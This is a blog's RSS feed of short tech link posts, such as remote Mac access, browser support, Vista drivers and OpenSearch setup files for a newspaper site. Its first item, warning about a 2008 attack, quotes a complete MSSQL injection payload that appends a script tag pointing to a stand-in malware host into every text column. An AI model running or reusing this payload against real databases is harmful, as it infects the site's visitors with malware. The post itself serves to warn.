<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>ourlil.com &#187; Windoze</title>
	<atom:link href="http://OurLil.com/blog/category/windoze/feed/" rel="self" type="application/rss+xml" />
	<link>http://OurLil.com</link>
	<description>A web site for tutti noi (all of us!)</description>
	<lastBuildDate>Mon, 26 Jul 2010 21:39:40 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0</generator>
		<item>
		<title>TrustedSource &#8211; Blog &#8211; New SQL Injection Attack Infecting Machines</title>
		<link>http://OurLil.com/blog/trustedsource-blog-new-sql-injection-attack-infecting-machines/182/</link>
		<comments>http://OurLil.com/blog/trustedsource-blog-new-sql-injection-attack-infecting-machines/182/#comments</comments>
		<pubDate>Tue, 12 Aug 2008 20:32:31 +0000</pubDate>
		<dc:creator>webmaestro</dc:creator>
				<category><![CDATA[Hacks]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[Windoze]]></category>
		<category><![CDATA[database]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[whoa!]]></category>
		<category><![CDATA[hack]]></category>

		<guid isPermaLink="false">http://clay.freedomblogging.com/2008/08/12/trustedsource-blog-new-sql-injection-attack-infecting-machines/</guid>
		<description><![CDATA[Here&#8217;s a sample of the type of SQL Injection MSSQL (and possibly Sybase) databases may be subjected to: DECLARE @T varchar(255), @C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name, b.name from sysobjects a, syscolumns b where a.id=b.id and a.xtype=â€™uâ€™ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C [...]]]></description>
			<content:encoded><![CDATA[<p>Here&#8217;s a sample of the type of SQL Injection MSSQL (and possibly Sybase) databases may be subjected to:<br />
<blockquote>DECLARE @T varchar(255), @C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name, b.name from sysobjects a, syscolumns b where a.id=b.id and a.xtype=â€™uâ€™ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec(â€™update ['+@T+'] set ['+@C +']=['+@C+']+â€â€&gt;&lt;/title&gt;&lt;script src=â€http://www.domain.com/malware/ w.jsâ€&gt;&lt;/script&gt;&lt;!â€“â€ where â€˜+@C+â€™ not like â€%â€&gt;&lt;/title&gt;&lt;script src=â€http://www.domain.com/malware/w.js â€œ&gt;&lt;/script&gt;&lt;!â€“â€â€™)FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor</p></blockquote>
<p><code></code>Â <a href="http://www.trustedsource.org/blog/142/New-SQL-Injection-Attack-Infecting-Machines">TrustedSource &#8211; Blog &#8211; New SQL Injection Attack Infecting Machines</a></p>
]]></content:encoded>
			<wfw:commentRss>http://OurLil.com/blog/trustedsource-blog-new-sql-injection-attack-infecting-machines/182/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>HOWTO Use Your Mac From Anywhere</title>
		<link>http://OurLil.com/blog/howto-use-your-mac-from-anywhere/79/</link>
		<comments>http://OurLil.com/blog/howto-use-your-mac-from-anywhere/79/#comments</comments>
		<pubDate>Tue, 30 Oct 2007 16:06:39 +0000</pubDate>
		<dc:creator>webmaestro</dc:creator>
				<category><![CDATA[Mac]]></category>
		<category><![CDATA[Unix]]></category>
		<category><![CDATA[WebTech]]></category>
		<category><![CDATA[Windoze]]></category>
		<category><![CDATA[nifty]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://OurLil.com/blog/howto-use-your-mac-from-anywhere/</guid>
		<description><![CDATA[HOWTO Use Your Mac From Anywhere This guide demonstrates using SSH tunnels and VNC screen-sharing software to use your Mac from any PC over the Internet. It&#8217;s fast, secure, cross-platform, and can be done entirely with open source software.]]></description>
			<content:encoded><![CDATA[<p><a href="http://howto.diveintomark.org/remote-mac/">HOWTO Use Your Mac From Anywhere</a><br />
This guide demonstrates using SSH tunnels and VNC screen-sharing software to use your Mac from any PC over the Internet.  It&#8217;s fast, secure, cross-platform, and can be done entirely with open source software.</p>
]]></content:encoded>
			<wfw:commentRss>http://OurLil.com/blog/howto-use-your-mac-from-anywhere/79/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Yahoo! UI Library: Graded Browser Support</title>
		<link>http://OurLil.com/blog/yahoo-ui-library-graded-browser-support/70/</link>
		<comments>http://OurLil.com/blog/yahoo-ui-library-graded-browser-support/70/#comments</comments>
		<pubDate>Fri, 28 Sep 2007 17:31:04 +0000</pubDate>
		<dc:creator>webmaestro</dc:creator>
				<category><![CDATA[Browsers]]></category>
		<category><![CDATA[CSS]]></category>
		<category><![CDATA[Freedom]]></category>
		<category><![CDATA[HTML]]></category>
		<category><![CDATA[Interactive Team]]></category>
		<category><![CDATA[WebTech]]></category>
		<category><![CDATA[Windoze]]></category>

		<guid isPermaLink="false">http://OurLil.com/blog/yahoo-ui-library-graded-browser-support/</guid>
		<description><![CDATA[Yahoo! UI Library: Graded Browser Support A-Grade Browser Support is probably what we should adopt, as well.]]></description>
			<content:encoded><![CDATA[<p><a href="http://developer.yahoo.com/yui/articles/gbs/index.html">Yahoo! UI Library: Graded Browser Support</a></p>
<p>A-Grade Browser Support is probably what we should adopt, as well.</p>
]]></content:encoded>
			<wfw:commentRss>http://OurLil.com/blog/yahoo-ui-library-graded-browser-support/70/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>amix.dk &#8211; Who are you?</title>
		<link>http://OurLil.com/blog/amixdk-who-are-you/67/</link>
		<comments>http://OurLil.com/blog/amixdk-who-are-you/67/#comments</comments>
		<pubDate>Wed, 26 Sep 2007 15:08:25 +0000</pubDate>
		<dc:creator>webmaestro</dc:creator>
				<category><![CDATA[Blogs]]></category>
		<category><![CDATA[Haha]]></category>
		<category><![CDATA[Mac]]></category>
		<category><![CDATA[NSFW]]></category>
		<category><![CDATA[Poll]]></category>
		<category><![CDATA[Unix]]></category>
		<category><![CDATA[Windoze]]></category>
		<category><![CDATA[whoa!]]></category>

		<guid isPermaLink="false">http://OurLil.com/blog/amixdk-who-are-you/</guid>
		<description><![CDATA[amix.dk &#8211; Who are you? I&#8217;m a Mac, but the Sun looks inviting&#8230;]]></description>
			<content:encoded><![CDATA[<p><a href="http://amix.dk/blog/viewEntry/19254">amix.dk &#8211; Who are you?</a></p>
<p>I&#8217;m a Mac, but the Sun looks inviting&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://OurLil.com/blog/amixdk-who-are-you/67/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Planning to run Windows? Buy a Mac!</title>
		<link>http://OurLil.com/blog/planning-to-run-windows-buy-a-mac/63/</link>
		<comments>http://OurLil.com/blog/planning-to-run-windows-buy-a-mac/63/#comments</comments>
		<pubDate>Fri, 21 Sep 2007 14:23:48 +0000</pubDate>
		<dc:creator>webmaestro</dc:creator>
				<category><![CDATA[Haha]]></category>
		<category><![CDATA[Interactive Team]]></category>
		<category><![CDATA[Mac]]></category>
		<category><![CDATA[Trends]]></category>
		<category><![CDATA[Windoze]]></category>
		<category><![CDATA[nifty]]></category>

		<guid isPermaLink="false">http://OurLil.com/blog/planning-to-run-windows-buy-a-mac/</guid>
		<description><![CDATA[Here&#8217;s a funny article about a story comparing installing Windows on a Mac vs. on a Sony Vaio&#8230; Wired Blogs: Gadget Lab]]></description>
			<content:encoded><![CDATA[<p><img src="http://blog.wired.com/gadgets/mac_win.jpg" alt="Running Windows? Buy a Mac!" width="490" /></p>
<p>Here&#8217;s a funny article about a story comparing installing Windows on a Mac vs. on a Sony Vaio&#8230;</p>
<p><a href="http://blog.wired.com/gadgets/2007/09/the-ultimate-wi.html">Wired Blogs: Gadget Lab</a></p>
]]></content:encoded>
			<wfw:commentRss>http://OurLil.com/blog/planning-to-run-windows-buy-a-mac/63/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>HFSExplorer &#8211; Browse Mac volumes from Windows</title>
		<link>http://OurLil.com/blog/hfsexplorer-browse-mac-volumes-from-windows/56/</link>
		<comments>http://OurLil.com/blog/hfsexplorer-browse-mac-volumes-from-windows/56/#comments</comments>
		<pubDate>Wed, 12 Sep 2007 16:03:20 +0000</pubDate>
		<dc:creator>webmaestro</dc:creator>
				<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Mac]]></category>
		<category><![CDATA[Windoze]]></category>

		<guid isPermaLink="false">http://OurLil.com/blog/hfsexplorer-browse-mac-volumes-from-windows/</guid>
		<description><![CDATA[HFSExplorer I haven&#8217;t tried it yet (haven&#8217;t needed it&#8230;), but it looks interesting.]]></description>
			<content:encoded><![CDATA[<p><a href="http://hem.bredband.net/catacombae/hfsx.html">HFSExplorer</a></p>
<p>I haven&#8217;t tried it yet (haven&#8217;t needed it&#8230;), but it looks interesting.</p>
]]></content:encoded>
			<wfw:commentRss>http://OurLil.com/blog/hfsexplorer-browse-mac-volumes-from-windows/56/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>MS-DOS 5 Upgrade Video &#8211; CollegeHumor video</title>
		<link>http://OurLil.com/blog/ms-dos-5-upgrade-video-collegehumor-video/55/</link>
		<comments>http://OurLil.com/blog/ms-dos-5-upgrade-video-collegehumor-video/55/#comments</comments>
		<pubDate>Wed, 12 Sep 2007 15:21:12 +0000</pubDate>
		<dc:creator>webmaestro</dc:creator>
				<category><![CDATA[Haha]]></category>
		<category><![CDATA[Windoze]]></category>
		<category><![CDATA[nifty]]></category>
		<category><![CDATA[whoa!]]></category>

		<guid isPermaLink="false">http://OurLil.com/blog/ms-dos-5-upgrade-video-collegehumor-video/</guid>
		<description><![CDATA[MS-DOS 5 Upgrade Video &#8211; CollegeHumor video This is too much!!!]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.collegehumor.com/video:1774935">MS-DOS 5 Upgrade Video &#8211; CollegeHumor video</a></p>
<p>This is too much!!!</p>
]]></content:encoded>
			<wfw:commentRss>http://OurLil.com/blog/ms-dos-5-upgrade-video-collegehumor-video/55/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Add Search Providers to Internet Explorer 7 &amp; Firefox</title>
		<link>http://OurLil.com/blog/add-search-providers-to-internet-explorer-7/54/</link>
		<comments>http://OurLil.com/blog/add-search-providers-to-internet-explorer-7/54/#comments</comments>
		<pubDate>Tue, 11 Sep 2007 15:25:36 +0000</pubDate>
		<dc:creator>webmaestro</dc:creator>
				<category><![CDATA[Browsers]]></category>
		<category><![CDATA[Freedom]]></category>
		<category><![CDATA[G]]></category>
		<category><![CDATA[HTML]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Interactive Team]]></category>
		<category><![CDATA[Trends]]></category>
		<category><![CDATA[WebTech]]></category>
		<category><![CDATA[Windoze]]></category>
		<category><![CDATA[nifty]]></category>
		<category><![CDATA[whoa!]]></category>

		<guid isPermaLink="false">http://OurLil.com/blog/add-search-providers-to-internet-explorer-7/</guid>
		<description><![CDATA[I believe that if we could arrange to have each of Freedom&#8217;s 7000 employees use as their browsers&#8217; default, local news resource, the web search tool, it would have an impact on Freedom revenue. At the very least, we may want to consider making this one of the steps in setting up new workstations. By [...]]]></description>
			<content:encoded><![CDATA[<blockquote><p>
<em>I believe that if we could arrange to have each of Freedom&#8217;s 7000 employees use as their browsers&#8217; default, local news resource, the web search tool, it would have an impact on Freedom revenue. At the very least, we may want to consider making this one of the steps in setting up new workstations.</em>
</p></blockquote>
<p>By following the directions on the following page, we can use the OCRegister.com Google &#8216;web&#8217; search results page our default for searches from the IE7 search bar:</p>
<ul>
<li><a href="http://www.microsoft.com/windows/ie/searchguide/en-en/default.mspx">Add Search Providers to Internet Explorer 7</a></li>
</ul>
<p>There are also instructions available to add them to the Mozilla Search Bar here:</p>
<ul>
<li><a href="http://developer.mozilla.org/en/docs/Creating_OpenSearch_plugins_for_Firefox">Creating_OpenSearch_plugins_for_Firefox</a></li>
</ul>
<p>Technoratiâ€™s OSD fileThat page has instructions indicating how to add a search engine plugin to your browser, and &#8216;advertise&#8217; how to do it to the web browser, so our visitors &amp; staff can add them to their browsers as well. Very Nifty!<span id="more-54"></span></p>
<p><a title="Reference_Material" name="Reference_Material"></a></p>
<h2> Reference Material</h2>
<ul>
<li><a href="http://opensearch.org/" title="http://opensearch.org/" rel="nofollow">OpenSearch Documentation</a>, <a href="http://www.opensearch.org/Specifications/OpenSearch/Extensions/Parameter/1.0" title="http://www.opensearch.org/Specifications/OpenSearch/Extensions/Parameter/1.0" rel="nofollow">OpenSearch Documentation about the Url and Param element</a></li>
<li>Technorati.com has a <a href="http://technorati.com/osd.xml" title="http://technorati.com/osd.xml" rel="nofollow">working osd.xml</a></li>
<li>More on Autodiscovery difficulties at bugzilla <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=340208" title="https://bugzilla.mozilla.org/show_bug.cgi?id=340208" rel="nofollow">bug 340208</a></li>
<li><a href="http://en.wikipedia.org/wiki/Data:_URI_scheme" title="http://en.wikipedia.org/wiki/Data:_URI_scheme" rel="nofollow"><code>data:</code> URI scheme</a></li>
<li><a href="http://www.searchplugins.net" title="http://www.searchplugins.net" rel="nofollow">searchplugins.net</a> &#8211; create OpenSearch plugins for use with Firefox 2. <a href="http://www.searchplugins.net/pluginlist.aspx" title="http://www.searchplugins.net/pluginlist.aspx" rel="nofollow">List of generated search plugins</a></li>
<li><a href="http://keijisaito.info/ready2search/e/" title="http://keijisaito.info/ready2search/e/" rel="nofollow">Ready2Search</a> &#8211; create OpenSearch plugins.  <a href="http://keijisaito.info/arc/search/en_make_plugin.htm" title="http://keijisaito.info/arc/search/en_make_plugin.htm" rel="nofollow">Customized Search through Ready2Search</a></li>
</ul>
<h2>Sample OSD Code</h2>
<p><b>Add this to your page&#8217;s &lt;head /&gt; section:</b></p>
<pre><code>
&lt;link
  rel=&quot;search&quot;
  type=&quot;application/opensearchdescription+xml&quot; href=&quot;http://OSD_DOMAIN_NAME/osdwebsearch.xml&quot;
  title=&quot;OSD_SITE_TITLE - Web Search&quot;
/&gt;
&lt;link
  rel=&quot;search&quot;
  type=&quot;application/opensearchdescription+xml&quot;
  href=&quot;http://OSD_DOMAIN_NAME/osdsitesearch.xml&quot;
  title=&quot;OSD_SITE_TITLE - Site Search&quot;
/&gt;
</code></pre>
<p>Add the following two files to /web/onset/sites/[yoursitecode]/web/ (<b>NOTE:</b> Replace JDNews.com-ish stuff with relevant text!):</p>
<p><b>osdwebsearch.xml</b></p>
<pre><code>
&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;
&lt;OpenSearchDescription xmlns=&quot;http://a9.com/-/spec/opensearch/1.1/&quot;&gt;
  &lt;ShortName&gt;OSD_TITLE - Web Search&lt;/ShortName&gt;
  &lt;Description&gt;OSD_WEB_SEARCH_DESCRIPTION&lt;/Description&gt;
  &lt;Contact&gt;OSD_EMAIL&lt;/Contact&gt;
  &lt;Url type=&quot;text/html&quot;
       method=&quot;get&quot;
       template=&quot;http://OSD_DOMAIN_NAME/OSD_PATH_TO_SEARCH_RESULTS/?q={searchTerms}&amp;amp;fistype=web&amp;amp;sourceid=opensearch&quot;&gt;
  &lt;/Url&gt;
  &lt;LongName&gt;OSD_WEB_LONG_TITLE - Web Search&lt;/LongName&gt;

  &lt;Image
       height=&quot;16&quot;
       width=&quot;16&quot;
       type=&quot;image/vnd.microsoft.icon&quot;&gt;

http://OSD_FAVICON_PATH/favicon.ico

  &lt;/Image&gt;
  &lt;Attribution&gt;
       OSD_COPYRIGHT_TEXT
  &lt;/Attribution&gt;

  &lt;AdultContent&gt;false&lt;/AdultContent&gt;
  &lt;Language&gt;en-us&lt;/Language&gt;
  &lt;OutputEncoding&gt;UTF-8&lt;/OutputEncoding&gt;
  &lt;InputEncoding&gt;UTF-8&lt;/InputEncoding&gt;
&lt;/OpenSearchDescription&gt;
</code></pre>
<p><b>osdsitesearch.xml</b></p>
<pre><code>
&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;
&lt;OpenSearchDescription xmlns=&quot;http://a9.com/-/spec/opensearch/1.1/&quot;&gt;
  &lt;ShortName&gt;OSD_SITE_TITLE - Site Search&lt;/ShortName&gt;
  &lt;Description&gt;OSD_SITE_SEARCH_DESCRIPTION&lt;/Description&gt;
  &lt;Contact&gt;OSD_EMAIL&lt;/Contact&gt;
  &lt;Url type=&quot;text/html&quot;
       method=&quot;get&quot;
       template=&quot;http://OSD_DOMAIN_NAME/OSD_PATH_TO_SEARCH_RESULTS/?q={searchTerms}&amp;amp;fistype=web&amp;amp;sourceid=opensearch&quot;&gt;
  &lt;/Url&gt;
  &lt;LongName&gt;OSD_SITE_LONG_TITLE - Site Search&lt;/LongName&gt;

  &lt;Image
       height=&quot;16&quot;
       width=&quot;16&quot;
       type=&quot;image/vnd.microsoft.icon&quot;&gt;

http://OSD_FAVICON_PATH/favicon.ico

  &lt;/Image&gt;
  &lt;Attribution&gt;
       OSD_COPYRIGHT_TEXT
  &lt;/Attribution&gt;

  &lt;AdultContent&gt;false&lt;/AdultContent&gt;
  &lt;Language&gt;en-us&lt;/Language&gt;
  &lt;OutputEncoding&gt;UTF-8&lt;/OutputEncoding&gt;
  &lt;InputEncoding&gt;UTF-8&lt;/InputEncoding&gt;
&lt;/OpenSearchDescription&gt;
</code></pre>
<h2>Functioning OSD Code (<a href="http://www.jdnews.com">JDNews.com</a>)</h2>
<p><b>Add this to your page&#8217;s &lt;head /&gt; section:</b></p>
<p><code><br />
&lt;link<br />
  rel=&quot;search&quot;<br />
  type=&quot;application/opensearchdescription+xml&quot; href=&quot;http://www.jdnews.com/osdwebsearch.xml&quot;<br />
  title=&quot;JDNews.com - Web Search&quot;<br />
/&gt;<br />
&lt;link<br />
  rel=&quot;search&quot;<br />
  type=&quot;application/opensearchdescription+xml&quot;<br />
  href=&quot;http://www.jdnews.com/osdsitesearch.xml&quot;<br />
  title=&quot;JDNews.com - Site Search&quot;<br />
/&gt;<br />
</code></p>
<p>Add the following two files to /web/onset/sites/[yoursitecode]/web/ (<b>NOTE:</b> Replace JDNews.com-ish stuff with relevant text!):</p>
<p><b>osdwebsearch.xml</b></p>
<pre><code>
&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;
&lt;OpenSearchDescription xmlns=&quot;http://a9.com/-/spec/opensearch/1.1/&quot;&gt;
  &lt;ShortName&gt;JDNews.com - Web Search&lt;/ShortName&gt;
  &lt;Description&gt;Search Eastern NC's premiere Information Source.
       Covering Jacksonville.&lt;/Description&gt;
  &lt;Contact&gt;support@freedom.com&lt;/Contact&gt;
  &lt;Url type=&quot;text/html&quot;
       method=&quot;get&quot;
       template=&quot;http://www.jdnews.com/search/?q={searchTerms}&amp;amp;fistype=web&amp;amp;sourceid=opensearch&quot;&gt;
  &lt;/Url&gt;
  &lt;LongName&gt;JDNews.com - Jacksonville Daily News - Web Search&lt;/LongName&gt;

  &lt;Image
       height=&quot;16&quot;
       width=&quot;16&quot;
       type=&quot;image/vnd.microsoft.icon&quot;&gt;

http://www.jdnews.com/favicon.ico

  &lt;/Image&gt;
  &lt;Attribution&gt;
       Copyright &#169; 2007 Freedom ENC Communication, Inc.
       All Rights Reserved. Content may not be reproduced without
       written permission from FENC Communications.
  &lt;/Attribution&gt;

  &lt;AdultContent&gt;false&lt;/AdultContent&gt;
  &lt;Language&gt;en-us&lt;/Language&gt;
  &lt;OutputEncoding&gt;UTF-8&lt;/OutputEncoding&gt;
  &lt;InputEncoding&gt;UTF-8&lt;/InputEncoding&gt;
&lt;/OpenSearchDescription&gt;
</code></pre>
<p><b>osdsitesearch.xml</b></p>
<pre><code>
&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;
&lt;OpenSearchDescription xmlns=&quot;http://a9.com/-/spec/opensearch/1.1/&quot;&gt;
  &lt;ShortName&gt;JDNews.com - Site Search&lt;/ShortName&gt;
  &lt;Description&gt;Search Eastern NC's premiere Information Source.
       Covering Jacksonville.&lt;/Description&gt;
  &lt;Contact&gt;support@freedom.com&lt;/Contact&gt;
  &lt;Url type=&quot;text/html&quot;
       method=&quot;get&quot;
       template=&quot;http://www.jdnews.com/search/?q={searchTerms}&amp;amp;fistype=site&amp;amp;sourceid=opensearch&quot;&gt;
  &lt;/Url&gt;
  &lt;LongName&gt;JDNews.com - Jacksonville Daily News - Site Search&lt;/LongName&gt;

  &lt;Image
       height=&quot;16&quot;
       width=&quot;16&quot;
       type=&quot;image/vnd.microsoft.icon&quot;&gt;

http://www.jdnews.com/favicon.ico

  &lt;/Image&gt;
  &lt;Attribution&gt;
       Copyright &#169; 2007 Freedom ENC Communication, Inc.
       All Rights Reserved. Content may not be reproduced without
       written permission from FENC Communications.
  &lt;/Attribution&gt;

  &lt;AdultContent&gt;false&lt;/AdultContent&gt;
  &lt;Language&gt;en-us&lt;/Language&gt;
  &lt;OutputEncoding&gt;UTF-8&lt;/OutputEncoding&gt;
  &lt;InputEncoding&gt;UTF-8&lt;/InputEncoding&gt;
&lt;/OpenSearchDescription&gt;
</code></pre>
<p>That&#8217;s all! Wanna check it out?</p>
<ol>
<li>Launch Mozilla <a href="http://www.mozilla.com/">Firefox</a> (tip? MSIE7 also supports <a href="http://opensearch.org/" title="http://opensearch.org/" rel="nofollow">OpenSearch</a>)</li>
<li>Go to <a href="http://www.jdnews.com/">JDNews.com</a></li>
<li>Click on the down arrow in the &#8216;Search bar&#8217; (the box/field adjacent to the Location/Address bar, not the Freedom Google bar in the web site)
<dl>
<dt>JDNews.com &#8211; Web Search</dt>
<dd>Does a &#8216;Web&#8217; search using JDNews.com&#8217;s Web Search &#8211; just like searching in the JDNews.com&#8217;s Google Bar with the (o) Web radio button checked</dd>
<dt>JDNews.com &#8211; Site Search</dt>
<dd>Does a &#8216;Site&#8217; search of JDNews.com articles using JDNews.com&#8217;s Web Search &#8211; just like searching in the JDNews.com&#8217;s Google Bar with the (o) Site radio button checked</dd>
</dl>
</li>
<li>You can add the JDNews.com search engine to your browser&#8217;s search bar tool by selecting &#8216;Add JDNews.com &#8211; Web Search&#8217; (or &#8216;Site Search&#8217;)</li>
</ol>
<p>I suspect it&#8217;d be in Freedom&#8217;s best interest to only provide [My-Domain].com &#8211; Web Search to our customers, to limit confusion. We may also want to modify the search results for searches coming from this box (e.g., to [Gasp!] remove or somehow adjust the sponsored results at the top&#8211;within contract of course!).</p>
]]></content:encoded>
			<wfw:commentRss>http://OurLil.com/blog/add-search-providers-to-internet-explorer-7/54/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>StorageMojo Â» Everything You Know About Disks Is Wrong</title>
		<link>http://OurLil.com/blog/storagemojo-%c2%bb-everything-you-know-about-disks-is-wrong/20/</link>
		<comments>http://OurLil.com/blog/storagemojo-%c2%bb-everything-you-know-about-disks-is-wrong/20/#comments</comments>
		<pubDate>Mon, 21 May 2007 18:47:23 +0000</pubDate>
		<dc:creator>webmaestro</dc:creator>
				<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Mac]]></category>
		<category><![CDATA[Windoze]]></category>
		<category><![CDATA[whoa!]]></category>

		<guid isPermaLink="false">http://OurLil.com/blog/storagemojo-%c2%bb-everything-you-know-about-disks-is-wrong/</guid>
		<description><![CDATA[StorageMojo Â» Everything You Know About Disks Is Wrong Everything You Know About Disks Is Wrong February 20th, 2007 by Robin Harris in Enterprise, Clusters Which do you believe? * Costly FC and SCSI drives are more reliable than cheap SATA drives. * RAID 5 is safe because the odds of two drives failing in [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://storagemojo.com/?p=383">StorageMojo Â» Everything You Know About Disks Is Wrong</a><br />
Everything You Know About Disks Is Wrong<br />
February 20th, 2007 by Robin Harris in Enterprise, Clusters</p>
<p>Which do you believe?</p>
<p>* Costly FC and SCSI drives are more reliable than cheap SATA drives.<br />
* RAID 5 is safe because the odds of two drives failing in the same RAID set are so low.<br />
* After infant mortality, drives are highly reliable until they reach the end of their useful life.<br />
* Vendor MTBF are a useful yardstick for comparing drives.</p>
<p>According the one of the â€œBest Paperâ€ awards at FAST â€˜07, none of these are backed by empirical evidence.</p>
]]></content:encoded>
			<wfw:commentRss>http://OurLil.com/blog/storagemojo-%c2%bb-everything-you-know-about-disks-is-wrong/20/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Free Vista Drivers &#8211; RadarSync</title>
		<link>http://OurLil.com/blog/free-vista-drivers-radarsync/19/</link>
		<comments>http://OurLil.com/blog/free-vista-drivers-radarsync/19/#comments</comments>
		<pubDate>Mon, 21 May 2007 18:46:44 +0000</pubDate>
		<dc:creator>webmaestro</dc:creator>
				<category><![CDATA[Windoze]]></category>

		<guid isPermaLink="false">http://OurLil.com/blog/free-vista-drivers-radarsync/</guid>
		<description><![CDATA[Free Vista Drivers &#8211; RadarSync Donâ€™t waste your time searching dozens of vendor websites every month for the driver updates you need. Just bookmark this page and come back whenever you need a new driver. This FREE page lists the latest Windows Vista drivers and provides direct links to the files for downloads. Weâ€™re offering [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.radarsync.com/vista/">Free Vista Drivers &#8211; RadarSync</a><br />
Donâ€™t waste your time searching dozens of vendor websites every month for the driver updates you need. Just bookmark this page and come back whenever you need a new driver.</p>
<p>This FREE page lists the latest Windows Vista drivers and provides direct links to the files for downloads. Weâ€™re offering this as a free service to the community, to help you all get through this challenging period of Vista-transitioning.</p>
<p>I havenâ€™t used the site, but thought it might be useful to someone hereâ€¦</p>
]]></content:encoded>
			<wfw:commentRss>http://OurLil.com/blog/free-vista-drivers-radarsync/19/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>
